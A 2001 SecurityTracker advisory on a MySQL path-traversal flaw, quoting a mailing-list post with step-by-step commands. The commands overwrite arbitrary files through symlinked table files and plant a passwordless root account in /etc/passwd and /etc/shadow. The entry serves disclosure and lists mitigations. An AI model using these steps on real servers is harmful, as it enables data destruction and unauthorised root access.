Re: MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
|
|
SecurityTracker Alert ID: 1001133 |
|
SecurityTracker URL: http://securitytracker.com/id/1001133
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 21 2001
|
Impact:
Denial of service via local system, Modification of user information, User access via local system
|
|
Version(s): mysql-3.20.32a
|
Description:
It is reported that any local MySQL user can exploit MySQL to write files on the server with the privileges assigned to the MySQL server (which may be root-level privileges in some cases). This can be used to gain additional access on the server.
A user reports that this vulnerabiltiy applies to mysql 3.23.32 [which is contrary to what the vendor has noted in a previous message].
This user tried the following commands:
mysql -u root ../../../../tmp
create table yikes(w int(4));
With these commands, the user was able to create:
/tmp/yikes.*
|
Impact:
An authorized local user can use MySQL to write files to the server in a denial of service attempt or in an attempt to obtain additional privileges. If the MySQL daemon is run as root, then the user can obtain root-level privileges.
|
Solution:
No solution was available at the time of this entry. The author of the original source report makes several recommendations: 1) Patch MySQL to check all tablename files
2) Patch MySQL to treat database names beginning with ".." as invalid database names.
3) Do not run the MySQL daemon as root.
|
Vendor URL: mysql.com (Links to External Site)
|
Cause:
Input validation error, State error
|
Underlying OS:
Linux (Any), UNIX (FreeBSD), UNIX (Solaris - SunOS), Windows (NT), Windows (95), Windows (98), Windows (2000)
|
|
Message History:
This archive entry is a follow-up to the message listed below.
|
Source Message Contents
|
Date: Tue, 20 Mar 2001 12:02:58 +1100
Subject: Re: potential vulnerability of mysqld running with root
|
Works for mysql 3.23.32 running as root.
I used:
mysql -u root ../../../../tmp
create table yikes(w int(4));
This created /tmp/yikes.*
>>> "Pavlov, Lesha" <lesha@NN.RU> 19/3/01 4:32:37 am >>>
Anybody, who get login and password to mysql can use it as DoS or r00t
exploit because mysql accepts '../blah-blah' as valid database name and
each table represented by 3 files tablename.ISD, tablename.ISM and
tablename.frm, But, when mysqld checks table already exists or not
exists, it checks _only_ tablename.frm :
Usage this "vulnerable features of mysql" to make big DoS (Will
Overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/owerwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.
Usage as r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
You getta r00t now!
Recomendations:
* Patch mysql to when check table presents, it checks all
tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names, started by '..' as incorrect
database names.
* And Main recomendation - do not run mysqld as root!!!
Patches:
not yet
Workaround:
chowns existing database tables to a normal user and run mysqld as this
unprivileged user - it will be better solution!.
Vulnerable versions:
This DoS/exploit tested on mysql-3.20.32a but i see another versions of
mysql also vulnerabile.
Comments:
Mysql dox recomends dont run mysqld as root, but People from RedHat
didnt read mysql dox - mysql istalled from rpm is vulnerable.
|
|
